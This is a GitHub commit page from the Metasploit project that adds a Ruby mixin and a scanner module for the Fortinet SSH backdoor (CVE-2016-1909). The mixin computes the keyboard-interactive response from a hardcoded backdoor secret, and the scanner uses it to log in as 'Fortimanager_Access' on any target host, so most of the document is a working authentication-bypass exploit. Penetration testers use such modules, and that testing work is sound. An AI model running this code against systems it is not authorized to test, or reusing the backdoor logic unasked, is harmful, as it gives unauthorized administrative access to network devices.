-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Move Fortinet backdoor to module and mixin
- Loading branch information
Showing
5 changed files
with
159 additions
and
96 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,95 @@ | ||
# -*- coding: binary -*- | ||
|
||
require 'net/ssh' | ||
|
||
module Msf::Exploit::Remote::Fortinet | ||
class Net::SSH::Authentication::Methods::KeyboardInteractive < Net::SSH::Authentication::Methods::Abstract | ||
|
||
# https://www.ietf.org/rfc/rfc4256.txt | ||
def authenticate(service_name, username, password = nil) | ||
debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } | ||
|
||
send_message(userauth_request( | ||
=begin | ||
string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) | ||
string service name (US-ASCII) | ||
string "keyboard-interactive" (US-ASCII) | ||
string language tag (as defined in [RFC-3066]) | ||
string submethods (ISO-10646 UTF-8) | ||
=end | ||
username, | ||
service_name, | ||
'keyboard-interactive', | ||
'', | ||
'' | ||
)) | ||
|
||
loop do | ||
message = session.next_message | ||
|
||
case message.type | ||
when USERAUTH_SUCCESS | ||
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } | ||
return true | ||
when USERAUTH_FAILURE | ||
debug { 'Received SSH_MSG_USERAUTH_FAILURE' } | ||
return false | ||
when USERAUTH_INFO_REQUEST | ||
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } | ||
|
||
=begin | ||
string name (ISO-10646 UTF-8) | ||
string instruction (ISO-10646 UTF-8) | ||
string language tag (as defined in [RFC-3066]) | ||
int num-prompts | ||
string prompt[1] (ISO-10646 UTF-8) | ||
boolean echo[1] | ||
... | ||
string prompt[num-prompts] (ISO-10646 UTF-8) | ||
boolean echo[num-prompts] | ||
=end | ||
name = message.read_string | ||
instruction = message.read_string | ||
_ = message.read_string | ||
|
||
prompts = [] | ||
|
||
message.read_long.times do | ||
prompt = message.read_string | ||
echo = message.read_bool | ||
prompts << [prompt, echo] | ||
end | ||
|
||
debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' } | ||
|
||
send_message(Net::SSH::Buffer.from( | ||
=begin | ||
byte SSH_MSG_USERAUTH_INFO_RESPONSE | ||
int num-responses | ||
string response[1] (ISO-10646 UTF-8) | ||
... | ||
string response[num-responses] (ISO-10646 UTF-8) | ||
=end | ||
:byte, USERAUTH_INFO_RESPONSE, | ||
:long, 1, | ||
:string, custom_handler(name, instruction, prompts) | ||
)) | ||
else | ||
raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}" | ||
end | ||
end | ||
end | ||
|
||
# http://seclists.org/fulldisclosure/2016/Jan/26 | ||
def custom_handler(title, instructions, prompt_list) | ||
n = prompt_list[0][0] | ||
m = Digest::SHA1.new | ||
m.update("\x00" * 12) | ||
m.update(n + 'FGTAbc11*xy+Qqz27') | ||
m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70") | ||
h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest) | ||
[h] | ||
end | ||
|
||
end | ||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -116,3 +116,6 @@ | |
|
||
# Kerberos Support | ||
require 'msf/core/exploit/kerberos/client' | ||
|
||
# Fortinet | ||
require 'msf/core/exploit/fortinet' |
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,61 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class Metasploit4 < Msf::Auxiliary | ||
|
||
include Msf::Exploit::Remote::Fortinet | ||
include Msf::Auxiliary::Scanner | ||
include Msf::Auxiliary::Report | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Fortinet Backdoor Scanner', | ||
'Description' => %q{ | ||
This module scans for the Fortinet backdoor. | ||
}, | ||
'Author' => [ | ||
'operator8203 <operator8203[at]runbox.com>', # PoC | ||
'wvu' # Module | ||
], | ||
'References' => [ | ||
['CVE', '2016-1909'], | ||
['EDB', '39224'], | ||
['PACKETSTORM', '135225'], | ||
['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], | ||
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] | ||
], | ||
'DisclosureDate' => 'Jan 09 2016', | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
register_options([ | ||
Opt::RPORT(22) | ||
]) | ||
end | ||
|
||
def run_host(ip) | ||
ssh = Net::SSH.start( | ||
ip, | ||
'Fortimanager_Access', | ||
port: datastore['RPORT'], | ||
auth_methods: ['keyboard-interactive'] | ||
) | ||
|
||
if ssh | ||
print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") | ||
report_vuln( | ||
:host => ip, | ||
:name => self.name, | ||
:refs => self.references, | ||
:info => ssh.transport.server_version.version | ||
) | ||
end | ||
end | ||
|
||
def rport | ||
datastore['RPORT'] | ||
end | ||
|
||
end |